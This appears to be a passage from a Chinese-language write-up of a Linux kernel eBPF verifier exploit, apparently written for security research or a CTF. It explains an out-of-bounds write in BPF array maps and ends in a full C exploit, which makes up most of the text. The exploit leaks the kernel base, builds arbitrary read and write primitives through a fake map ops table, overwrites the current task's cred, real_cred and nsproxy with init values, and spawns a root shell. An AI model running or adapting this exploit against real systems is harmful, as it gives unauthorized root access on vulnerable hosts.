		info.btf_value_type_id = map->btf_value_type_id;
	}
	//...

	if (copy_to_user(uinfo, &info, info_len) ||
	    put_user(info_len, &uattr->info.info_len))
		return -EFAULT;

	return 0;
}

static int bpf_obj_get_info_by_fd(const union bpf_attr *attr,
				  union bpf_attr __user *uattr)
{
	int ufd = attr->info.bpf_fd;
	struct fd f;
	int err;

	if (CHECK_ATTR(BPF_OBJ_GET_INFO_BY_FD))
		return -EINVAL;

	f = fdget(ufd);
	if (!f.file)
		return -EBADFD;

	if (f.file->f_op == &bpf_prog_fops)
		err = bpf_prog_get_info_by_fd(f.file, f.file->private_data, attr,
					      uattr);
	else if (f.file->f_op == &bpf_map_fops)
		err = bpf_map_get_info_by_fd(f.file, f.file->private_data, attr,
					     uattr);

所以我们可以通过越界写控制 btf 指针完成任意地址读，但是注意每次只能读 4 字节。

这里我们利用任意读遍历 init_task 的 tasks 链表，以 comm 为 tag 进行遍历，从而找到 current_task

越界写实现任意写

注意到 array map 的 map_get_next_key() 定义如下，当 key 小于 map.max_entries - 1 时，key + 1 会被写入到 next_key 当中：

/* Called from syscall */
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
	struct bpf_array *array = container_of(map, struct bpf_array, map);
	u32 index = key ? *(u32 *)key : U32_MAX;
	u32 *next = (u32 *)next_key;

	if (index >= array->map.max_entries) {
		*next = 0;
		return 0;
	}

	if (index == array->map.max_entries - 1)
		return -ENOENT;

	*next = index + 1;
	return 0;
}

当然对于常规的调用 map_get_next_key() 的流程而言虽然 key 的内容是可控的但是 next_key 指针不是我们所能控制的：

static int map_get_next_key(union bpf_attr *attr)
{
	//...
	next_key = kmalloc(map->key_size, GFP_USER);
	//...

	rcu_read_lock();
	err = map->ops->map_get_next_key(map, key, next_key);

但是在 map ops 当中有一些函数可以让我们控制这两个参数，我们可以将这样的函数指针替换为 map_get_next_key() 从而完成任意地址写，例如 map_push_elem() ：

struct bpf_map_ops {
	//...
	int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);

当我们更新 eBPF map 时，若 map 类型为 BPF_MAP_TYPE_QUEUE 或 BPF_MAP_TYPE_STACK ，则这个函数会被调用：

static int bpf_map_update_value(struct bpf_map *map, struct fd f, void *key,
				void *value, __u64 flags)
{
	//...
	} else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
		   map->map_type == BPF_MAP_TYPE_STACK) {
		err = map->ops->map_push_elem(map, value, flags);

那么这个 fake_ops 伪造在哪里呢？开启 smap 的情况下，我们只能伪造在内核空间。还记得之前泄漏的 map_addr 吗？我们知道 value_addr = map_addr + 0x110，而 value 中的值用户是可控的，其地址又是知道的，所以 fake_ops 自然就伪造在 value 中了，而 map_type 也是可以直接通过越界写进行修改。注意这里也是只能写 4 字节，并且还要绕过如下限制：

static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
	struct bpf_array *array = container_of(map, struct bpf_array, map);
	u32 index = key ? *(u32 *)key : U32_MAX;
	u32 *next = (u32 *)next_key;

	if (index >= array->map.max_entries) {
		*next = 0;
		return 0;
	}

	if (index == array->map.max_entries - 1)
		return -ENOENT;

	*next = index + 1;
	return 0;
}

这里利用越界写直接修改 max_entries = 0xffffffff。

最后提权时，我直接修改 current_task 的 cred/real_cred 为 init_cred，但是这里需要注意的是 init_cred 地址的高 4 字节恒为 0xffffffff，这是无法写入的：要写入 0xffffffff 需要 index = 0xfffffffe，而这恰好满足 index == array->map.max_entries - 1，函数会直接返回 -ENOENT。但是我们可以通过错位写绕过，因为普通用户的 cred/real_cred 是在堆上分配的，其指针的高 2 字节恒为 0xffff，所以我们其实只需要覆盖低 6 字节即可

exp 及效果演示

exp 如下：

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <ctype.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/bpf.h>
#include "bpf_insn.h"


/*
 * Report a fatal error and terminate.
 *
 * Prints a red "[x] Error at:" banner followed by msg on stdout, waits two
 * seconds so the message stays visible, then exits with EXIT_FAILURE.
 * This function does not return.
 */
void err_exit(char *msg)
{
    const unsigned int pause_seconds = 2;

    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(pause_seconds);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[35m\033[1m[+] %s\n\033[0m", msg);
}

/*
 * Print a labelled value in hexadecimal: "[+] <msg>: 0x<value>".
 *
 * msg   - label printed in bold green
 * value - number printed with a 0x prefix; %zx is the conversion that matches
 *         size_t, so the call is well-defined on every ABI
 */
void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: \033[0m%#zx\n", msg, value);
}

/*
 * Hex-dump a buffer to stdout, four 64-bit words (32 bytes) per row.
 *
 * desc - optional title line; skipped when NULL
 * addr - start of the buffer; it is read as an array of uint64_t
 * len  - buffer length in bytes
 *
 * Each row shows the byte offset, up to four words and an ASCII column in
 * which non-printable bytes appear as '.'. Rows are driven by len / 8, so a
 * buffer shorter than 8 bytes prints no rows, and trailing bytes beyond the
 * last whole word only appear in the ASCII column of an existing row.
 */
void binary_dump(char *desc, void *addr, int len) {
    const int words_per_row = 4;
    const int word_count = len / 8;
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;

    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int row = 0; row < word_count; row += words_per_row) {
        /* Casts make the arguments match the %x / %llx conversions exactly. */
        printf("  %04x", (unsigned int)(row * 8));
        for (int col = 0; col < words_per_row; col++) {
            if (row + col < word_count) {
                printf(" 0x%016llx", (unsigned long long)buf64[row + col]);
            } else {
                /* Pad a missing word so the ASCII column stays aligned. */
                printf("                   ");
            }
        }
        printf("   ");
        for (int j = 0; j < 32 && j + row * 8 < len; j++) {
            printf("%c", isprint(buf8[row * 8 + j]) ? buf8[row * 8 + j] : '.');
        }
        puts("");
    }
}

/*
 * Check the real user ID and, if it is 0, start /bin/sh via system().
 *
 * When getuid() is non-zero a failure banner is printed and the process
 * exits with EXIT_FAILURE after a two-second pause. After the shell returns
 * the process exits with EXIT_SUCCESS, so this function never returns.
 */
void get_root_shell(void)
{
    const unsigned int pause_seconds = 2;

    if (getuid() != 0) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(pause_seconds);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

    system("/bin/sh");

    /* Leave through exit() so the process ends normally instead of crashing. */
    exit(EXIT_SUCCESS);
}

/*
 * Pin the calling process to a single CPU.
 *
 * core - index of the CPU to run on
 *
 * Best effort: if sched_setaffinity() fails, the reason is reported with
 * perror() and the function returns without printing the success line, so
 * the log no longer claims a binding that did not happen.
 */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) != 0) {
        perror("sched_setaffinity");
        return;
    }

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

/*
 * Thin wrapper around the bpf(2) system call.
 *
 * cmd  - BPF command number
 * attr - command arguments; the size passed to the kernel is always
 *        sizeof(union bpf_attr)
 *
 * Returns the raw syscall result narrowed to int.
 */
static inline int bpf(int cmd, union bpf_attr *attr)
{
    const size_t attr_size = sizeof(*attr);
    long rc = syscall(__NR_bpf, cmd, attr, attr_size);

    return rc;
}

/*
 * Create a BPF map via BPF_MAP_CREATE.
 *
 * map_type    - BPF_MAP_TYPE_* value
 * key_size    - size of a key in bytes
 * value_size  - size of a value in bytes
 * max_entries - capacity of the map
 *
 * Returns the result of bpf(): a file descriptor on success, negative on
 * failure.
 */
static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
               unsigned int value_size, unsigned int max_entries)
{
        union bpf_attr attr;

        /* Clear the whole union explicitly: an initializer is only
         * guaranteed to set the named member, and non-zero bytes in the
         * unused part of the attribute can make the call fail.
         */
        memset(&attr, 0, sizeof(attr));
        attr.map_type = map_type;
        attr.key_size = key_size;
        attr.value_size = value_size;
        attr.max_entries = max_entries;

        return bpf(BPF_MAP_CREATE, &attr);
}

/*
 * Look up one element via BPF_MAP_LOOKUP_ELEM.
 *
 * map_fd - map file descriptor
 * key    - pointer to the key to look up
 * value  - buffer that receives the value
 *
 * Returns the result of bpf().
 */
static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{
        union bpf_attr attr;

        /* Zero every byte of the union, not just the members set below. */
        memset(&attr, 0, sizeof(attr));
        attr.map_fd = map_fd;
        /* Go through uintptr_t so the pointer-to-u64 conversion is explicit. */
        attr.key = (uint64_t)(uintptr_t)key;
        attr.value = (uint64_t)(uintptr_t)value;

        return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

/*
 * Create or update one element via BPF_MAP_UPDATE_ELEM.
 *
 * map_fd - map file descriptor
 * key    - pointer to the key
 * value  - pointer to the new value
 * flags  - update flags passed through unchanged
 *
 * Returns the result of bpf().
 */
static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{
        union bpf_attr attr;

        /* Zero every byte of the union, not just the members set below. */
        memset(&attr, 0, sizeof(attr));
        attr.map_fd = map_fd;
        /* Go through uintptr_t so the pointer-to-u64 conversion is explicit. */
        attr.key = (uint64_t)(uintptr_t)key;
        attr.value = (uint64_t)(uintptr_t)value;
        attr.flags = flags;

        return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

/*
 * Delete one element via BPF_MAP_DELETE_ELEM.
 *
 * map_fd - map file descriptor
 * key    - pointer to the key to delete
 *
 * Returns the result of bpf().
 */
static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{
        union bpf_attr attr;

        /* Zero every byte of the union, not just the members set below. */
        memset(&attr, 0, sizeof(attr));
        attr.map_fd = map_fd;
        /* Go through uintptr_t so the pointer-to-u64 conversion is explicit. */
        attr.key = (uint64_t)(uintptr_t)key;

        return bpf(BPF_MAP_DELETE_ELEM, &attr);
}

/*
 * Issue BPF_MAP_GET_NEXT_KEY for a map.
 *
 * map_fd:   descriptor of the map.
 * key:      address of the current key.
 * next_key: address of the buffer that receives the following key.
 *
 * Returns the result of bpf() for BPF_MAP_GET_NEXT_KEY.
 */
static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{
        union bpf_attr attr;

        /*
         * Clear the whole union explicitly: bpf() is called with
         * sizeof(union bpf_attr), and a designated initializer is not
         * guaranteed to zero the bytes outside the members it names.
         */
        memset(&attr, 0, sizeof(attr));
        attr.map_fd = map_fd;
        attr.key = (uint64_t)(uintptr_t)key;
        attr.next_key = (uint64_t)(uintptr_t)next_key;

        return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}

/*
 * Query a map with BPF_OBJ_GET_INFO_BY_FD and return the btf_id field of
 * the resulting struct bpf_map_info.
 *
 * map_fd: descriptor of the map to query.
 *
 * The result of the system call is not inspected. Because the info
 * structure is cleared first, a call that fails without writing to it
 * yields 0 instead of an indeterminate value.
 */
static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{
        struct bpf_map_info info;
        union bpf_attr attr;

        /* Start from all-zero structures so no stack garbage is passed in
         * or read back. */
        memset(&info, 0, sizeof(info));
        memset(&attr, 0, sizeof(attr));
        attr.info.bpf_fd = map_fd;
        attr.info.info_len = sizeof(info);
        attr.info.info = (uint64_t)(uintptr_t)&info;

        bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
        return info.btf_id;
}

/* Shared state used by prep(), trigger(), leak() and the read/write helpers. */
int sockets[2];         // socket pair from prep(); the program is attached to [1], trigger() writes to [0]
int map_fd;             // array map created in prep() with value size 0x100
int expmap_fd;          // array map created in prep() with value size 0x200
int prog_fd;            // descriptor returned by BPF_PROG_LOAD in prep()
uint32_t key;           // map key; never assigned in this part of the file, so it stays 0
uint64_t* value1;       // 0x1000-byte user buffer written to map_fd
uint64_t* value2;       // 0x1000-byte user buffer written to expmap_fd
/*
 * Hard-coded kernel addresses; leak() adds koffset to each of them.
 * NOTE(review): presumably taken from the symbol table of the author's test
 * kernel ("D" looks like an nm symbol type) -- they must be re-derived for
 * any other build.
 */
uint64_t array_map_ops = 0xffffffff8226d900;
uint64_t init_cred = 0xffffffff82893a00; // D init_cred
uint64_t init_task = 0xffffffff82816080; // D init_task
uint64_t init_nsproxy = 0xffffffff82893720; // D init_nsproxy
/* -1 means "not leaked yet"; leak() fills these in and checks koffset against -1. */
uint64_t map_addr = -1;
uint64_t koffset = -1;
uint64_t kbase = -1;
/* The bytes of "XiaozaYa" read as a little-endian 64-bit value -- the same
 * string prep() passes to prctl(PR_SET_NAME). leak() searches for it. */
uint64_t tag = 0x6159617a6f616958;
uint64_t current_task;  // set by leak() to the address of the entry whose name field matches tag

/*
 * eBPF program that prep() loads as a socket filter and attaches to
 * sockets[1]; trigger() runs it by sending a datagram.
 *
 * The two maps are referenced by the literal descriptors 3 and 4, so the
 * program relies on prep() receiving exactly those numbers for map_fd and
 * expmap_fd.
 *
 * Layout of value_buf1 (element 0 of the first map), in 8-byte slots:
 *   [0] input:  value loaded into r6 (the callers always store 2)
 *   [1] input:  if non-zero, stored at r7 + 0x40
 *   [2] input:  if non-zero, stored at r7 + 0 and followed by three
 *               32-bit stores at r7 + 0x18 / 0x24 / 0x2c
 *   [3] output: 8 bytes read from r7 + 0
 *   [4] output: 8 bytes read from r7 + 0xc0
 * where r7 = (address of expmap's value) - r6 after the arithmetic below.
 *
 * The structure-field names in the trailing comments (array_map_ops, btf,
 * map_type, max_entries, spin_lock_off) are the original author's
 * annotations for the target kernel and cannot be verified from this file.
 */
struct bpf_insn prog[] = {

        BPF_LD_MAP_FD(BPF_REG_1, 3),    // r1 = map behind fd 3 (hard-coded; expected to be map_fd)
        BPF_MOV64_IMM(BPF_REG_6, 0),    // r6 = 0
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8), // *(uint64_t*)(fp - 8) = r6 = 0 (lookup key)
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_10),           // r7 = r10 = fp
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8),          // r7 = r7 - 8 = fp - 8
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_7),            // r2 = r7 = fp - 8
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // r0 = map_lookup_elem(r1, r2)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),                          // if r0 != 0 (lookup succeeded) skip the exit
        BPF_EXIT_INSN(),                                                // exit
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),                            // r9 = r0 = value_buf1 ptr
        BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_9, 0),                   // r6 = value_buf1[0] (2 at run time)
        BPF_MOV64_IMM(BPF_REG_0, 0),                                    // r0 = 0
        BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 1, 1),                          // if r6 >= 1 skip the exit (author: raises r6.umin_value)
        BPF_EXIT_INSN(),                                                // exit
        BPF_MOV64_IMM(BPF_REG_8, 1),                                    // r8 = 1
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32),                          // r8 = r8 << 32 = 0x1 0000 0000
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 1),                           // r8 = r8 + 1 = 0x1 0000 0001
        BPF_JMP_REG(BPF_JLE, BPF_REG_6, BPF_REG_8, 1),                  // if r6 <= r8 skip the exit (author: sets r6.umax_value = 0x1 0000 0001)
        BPF_EXIT_INSN(),                                                // exit
//      BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_JMP32_IMM(BPF_JNE, BPF_REG_6, 5, 1),                        // if (u32)r6 != 5 skip the exit (author: this 32-bit compare triggers the bug)
//      BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),                                                // exit

        // Run-time values below assume value_buf1[0] == 2.
        // NOTE(review): the technique relies on the verifier tracking a different value for r6 here -- confirm against the write-up.
        BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2),                           // r6 = r6 & 2 = 2
        BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1),                           // r6 = r6 >> 1 = 1
        BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),                       // r6 = r6 * 0x110 = 0x110

        BPF_LD_MAP_FD(BPF_REG_1, 4),                                    // r1 = map behind fd 4 (hard-coded; expected to be expmap_fd)
        BPF_MOV64_IMM(BPF_REG_8, 0),                                    // r8 = 0
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8),                 // *(uint64_t*)(fp - 8) = r8 = 0 (lookup key)
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_10),                           // r7 = r10 = fp
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8),                          // r7 = r7 - 8 = fp - 8
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_7),                            // r2 = r7 = fp - 8
        BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // r0 = map_lookup_elem(r1, r2)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),                          // if r0 != 0 (lookup succeeded) skip the exit
        BPF_EXIT_INSN(),                                                // exit
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),                            // r7 = r0 = value_buf2 addr
        BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),                   // r7 = r7 - r6 = value_buf2 addr - 0x110
        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0),                   // r8 = *(uint64_t*)r7 (author: array_map_ops)

        BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x18),                // value_buf1[3] = r8
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_8),                            // r2 = r8 (r2 is not read again below)

        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0xc0),                // r8 = *(uint64_t*)(r7 + 0xc0) (leak() derives map_addr from it)
        BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, 0x20),                // value_buf1[4] = r8

        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 8),                   // r8 = value_buf1[1]
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 1),                          // if r8 == 0 skip the next store
        BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0x40),                // *(uint64_t*)(r7 + 0x40) = r8 (author: btf)

        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 0x10),                // r8 = value_buf1[2]
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_8, 0, 4),                          // if r8 == 0 skip the next four stores
        BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),                   // *(uint64_t*)(r7 + 0) = r8 (author: expmap's bpf_map_ops = fake_ops)
        BPF_ST_MEM(BPF_W, BPF_REG_7, 0x18, BPF_MAP_TYPE_STACK),         // *(uint32_t*)(r7 + 0x18) = BPF_MAP_TYPE_STACK (author: map_type)
        BPF_ST_MEM(BPF_W, BPF_REG_7, 0x24, -1),                         // *(uint32_t*)(r7 + 0x24) = -1 (author: max_entries)
        BPF_ST_MEM(BPF_W, BPF_REG_7, 0x2c, 0),                          // *(uint32_t*)(r7 + 0x2c) = 0 (author: spin_lock_off)
        BPF_ALU64_IMM(BPF_MOV, BPF_REG_0, 0),                           // r0 = 0
        BPF_EXIT_INSN(),                                                // exit
};

/* Size of the buffer handed to the kernel for the verifier log. */
#define BPF_LOG_SZ 0x10000
/* Receives the verifier log; prep() prints it when BPF_PROG_LOAD fails. */
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };

/*
 * Attributes for the BPF_PROG_LOAD call in prep(): load prog[] as a socket
 * filter under the "GPL" license string, with log level 1 and the log
 * written to bpf_log_buf.
 *
 * The map helper functions declare their own local variable named attr,
 * which shadows this global inside them.
 */
union bpf_attr attr = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insns = (uint64_t) &prog,
    .insn_cnt = sizeof(prog) / sizeof(prog[0]),     // number of struct bpf_insn entries in prog[]
    .license = (uint64_t) "GPL",
    .log_level = 1,
    .log_buf = (uint64_t) bpf_log_buf,
    .log_size = BPF_LOG_SZ,
};


/* Switch stdin, stdout and stderr to unbuffered mode, in that order. */
void init() {
        FILE *streams[] = { stdin, stdout, stderr };
        unsigned int idx;

        for (idx = 0; idx < sizeof(streams) / sizeof(streams[0]); idx++)
                setbuf(streams[idx], NULL);
}

/*
 * Send one 64-byte datagram through sockets[0]. prep() attaches the BPF
 * program to sockets[1], the other end of the pair, so this is what makes
 * the program run.
 *
 * The payload is all zeroes (the original sent an uninitialised stack
 * buffer). A failing write() is reported on stderr.
 */
void trigger() {
        char buffer[64] = { 0 };

        if (write(sockets[0], buffer, sizeof(buffer)) < 0)
                perror("write");
}

/*
 * One-time setup: allocate the two user-space value buffers, set the
 * process name, create both array maps, load the BPF program and attach it
 * to one end of a UNIX datagram socket pair.
 *
 * prog[] refers to the maps by the literal descriptors 3 and 4, so this
 * relies on map_fd and expmap_fd receiving exactly those numbers.
 * TODO confirm descriptors 0-2 are the only ones open at this point.
 *
 * Each failing step is reported with perror() and then passed to err_exit().
 */
void prep() {

        value1 = calloc(0x1000, 1);
        value2 = calloc(0x1000, 1);
        if (value1 == NULL || value2 == NULL) {
                perror("calloc");
                err_exit("calloc");
        }

        /* leak() later searches kernel memory for this name (see tag). */
        prctl(PR_SET_NAME, "XiaozaYa");

        map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x100, 1);
        if (map_fd < 0) {
                perror("BPF_MAP_CREATE");
                err_exit("BPF_MAP_CREATE");
        }

        expmap_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x200, 1);
        if (expmap_fd < 0) {
                perror("BPF_MAP_CREATE");
                err_exit("BPF_MAP_CREATE");
        }

        prog_fd = bpf(BPF_PROG_LOAD, &attr);
        if (prog_fd < 0) {
                /* Dump the verifier log first; it explains most load failures. */
                puts(bpf_log_buf);
                perror("BPF_PROG_LOAD");
                err_exit("BPF_PROG_LOAD");
        }

        if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0) {
                perror("socketpair()");
                err_exit("socketpair()");
        }

        if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0) {
                /* The original reported this failure as "socketpair". */
                perror("setsockopt SO_ATTACH_BPF");
                err_exit("setsockopt SO_ATTACH_BPF");
        }
}

/*
 * Return a 32-bit value associated with addr, obtained through the map-info
 * interface.
 *
 * Slot 1 of value_buf1 is set to addr - 0x58 and slot 2 to 0, so the BPF
 * program performs only its store at r7 + 0x40 (annotated "btf" by the
 * author). After the program has run, the btf_id reported for expmap_fd is
 * returned.
 * NOTE(review): presumably 0x58 is the offset of the id field inside the
 * kernel's struct btf on the target build -- confirm.
 */
uint32_t arb_read_4_byte(uint64_t addr) {
        value1[0] = 2;              // value the program loads into r6
        value1[1] = addr - 0x58;    // non-zero: enables the store at r7 + 0x40
        value1[2] = 0;              // zero: the program skips its last four stores
        bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
        bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
        trigger();                  // run the program once
        return bpf_map_get_info_by_fd(expmap_fd);
}

/*
 * Read 64 bits at addr as two 32-bit reads: the low half from addr first,
 * then the high half from addr + 4.
 */
uint64_t arb_read(uint64_t addr) {
        uint64_t result = 0;
        unsigned int half;

        for (half = 0; half < 2; half++) {
                uint64_t word = arb_read_4_byte(addr + 4 * half);

                result |= word << (32 * half);
        }
        return result;
}

/*
 * Arm the write helper: copy a table of function addresses into value2,
 * push both value buffers into their maps and run the BPF program once
 * with slot 2 of value_buf1 set, which enables the program's final store
 * sequence.
 *
 * Must run after leak(), which provides map_addr and koffset.
 *
 * The table entries are hard-coded addresses for the author's kernel
 * build; every non-zero entry is rebased by koffset.
 * NOTE(review): which operation each slot stands for, and how
 * map_addr+0x110+0x20 relates to where the table lands in kernel memory,
 * is not visible in this file -- confirm against the write-up.
 */
void prep_arb_write() {

        value1[0] = 2;                          // value the program loads into r6
        value1[1] = 0;                          // zero: the program skips its store at r7 + 0x40
        value1[2] = map_addr+0x110+0x20;        // non-zero: stored at r7 + 0 by the program

        uint64_t fake_ops[] = {
                0x0,0x0,0x0,0x0,
                0xffffffff812677b0,
                0xffffffff81268830,
                0x0,
                0xffffffff81267df0,
                0xffffffff812678a0,
                0x0,0x0,
                0xffffffff8124a150,
                0x0,
                0xffffffff81249f20,
                0x0,
                0xffffffff81267930,
                0xffffffff81267c70,
                0xffffffff81267780,
                0xffffffff812678a0,
                0x0,0x0,0x0,0x0,
                0xffffffff81268340,
                0x0,
                0xffffffff81267a10,
                0xffffffff81268640,
                0x0,0x0,0x0,
                0xffffffff81267830,
                0xffffffff81267860,
                0xffffffff812679d0
        };

        /* Rebase the populated slots; empty slots stay zero. */
        for (size_t i = 0; i < sizeof(fake_ops) / sizeof(fake_ops[0]); i++) {
                if (fake_ops[i]) fake_ops[i] += koffset;
        }

        memcpy(value2, fake_ops, sizeof(fake_ops));
        bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
        bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);

        trigger();
}

/*
 * Request a 32-bit write of val at addr through expmap_fd.
 *
 * val - 1 is placed in the first slot of value2 and addr is passed in the
 * flags argument of the map-update call.
 * NOTE(review): presumably, once prep_arb_write() has run, the kernel
 * handler reached by this update stores (first 32 bits of value) + 1 at the
 * address taken from flags -- that behaviour is not visible in this file;
 * confirm against the write-up. If so, val == 0 (val - 1 wraps) needs
 * checking separately.
 */
void arb_write_4_byte(uint64_t addr, uint32_t val) {

        value2[0] = val - 1;
        bpf_map_update_elem(expmap_fd, &key, value2, addr);     // addr travels in the flags field
}

/*
 * Write 64 bits at addr as two 32-bit writes: the low half to addr first,
 * then the high half to addr + 4.
 */
void arb_write(uint64_t addr, uint64_t val) {
        uint64_t low_half = val & 0xffffffff;
        uint64_t high_half = (val >> 32) & 0xffffffff;

        arb_write_4_byte(addr, low_half);
        arb_write_4_byte(addr + 4, high_half);
}

/*
 * Leak two kernel pointers through value_buf1, derive the kernel offset and
 * the map address from them, rebase the hard-coded symbol addresses, and
 * then walk a linked list starting at init_task until the entry carrying
 * this process's name tag is found (stored in current_task).
 *
 * Calls err_exit() when the leaked value does not look like the expected
 * pointer.
 * NOTE(review): the list walk has no termination condition other than
 * finding the tag.
 */
void leak() {

        uint64_t buf[0x200/8] = { 0 };
        value1[0] = 2;          // value the program loads into r6
        value1[1] = 0;          // zero: the program skips its store at r7 + 0x40
        value1[2] = 0;          // zero: the program skips its last four stores
        bpf_map_update_elem(map_fd, &key, value1, BPF_ANY);
        bpf_map_update_elem(expmap_fd, &key, value2, BPF_ANY);
        trigger();
        memset(buf, 0, sizeof(buf));
        // Read back value_buf1: the program stored its two loads in slots 3 and 4.
        bpf_map_lookup_elem(map_fd, &key, buf);
//      binary_dump("LEAK DATA", buf, 0x100);
        // Plausibility check: upper 32 bits all ones and low 12 bits equal to
        // those of the hard-coded array_map_ops address (0x900).
        if ((buf[3] & 0xffffffff00000fff) == 0xffffffff00000900) {
                koffset = buf[3] - array_map_ops;
                kbase = 0xffffffff81000000 + koffset;
                map_addr = buf[4] - 0xc0;
                hexx("koffset", koffset);
                hexx("kbase", kbase);
                hexx("map_addr", map_addr);
        }

        // koffset still holds its initial -1 when the check above failed.
        if (koffset == -1) err_exit("FAILED to leak kernel base");
        array_map_ops += koffset;
        init_cred += koffset;
        init_task += koffset;
        init_nsproxy += koffset;
        hexx("init_cred", init_cred);
        hexx("init_task", init_task);
        hexx("init_nsproxy", init_nsproxy);

        // NOTE(review): presumably 0xa58 is the offset of the name (comm) field
        // and 0x7a0 that of the task list head in the target kernel's
        // task_struct, with 0x7a8 being its second pointer -- confirm.
        current_task = init_task;
        for (;;) {
                if (arb_read(current_task+0xa58) == tag) {
                        break;
                }
                current_task = arb_read(current_task + 0x7a8) - 0x7a0;
        }
        hexx("current_task", current_task);
}

/*
 * Entry point: run the setup, leak and write-preparation stages, overwrite
 * three pointer fields of the located task entry, then call
 * get_root_shell().
 *
 * Each pointer is written with two overlapping 32-bit stores: bits 0..31 at
 * the field offset, then bits 16..47 at offset + 2. The top two bytes of
 * the 8-byte field are never written.
 * NOTE(review): presumably done because the write helper cannot store every
 * 32-bit value -- confirm.
 */
int main(int argc, char** argv, char** envp)
{

        init();
        prep();
        leak();
        prep_arb_write();

        // Field offsets used below (author's notes for the target kernel):
        // cred: 0xa48 real_cred: 0xa40 nsproxy: 0xaa8

        arb_write_4_byte(current_task+0xa48, init_cred&0xffffffff);
        arb_write_4_byte(current_task+0xa48+2, (init_cred>>16)&0xffffffff);
        arb_write_4_byte(current_task+0xa40, init_cred&0xffffffff);
        arb_write_4_byte(current_task+0xa40+2, (init_cred>>16)&0xffffffff);
        arb_write_4_byte(current_task+0xaa8, init_nsproxy&0xffffffff);
        arb_write_4_byte(current_task+0xaa8+2, (init_nsproxy>>16)&0xffffffff);
        get_root_shell();

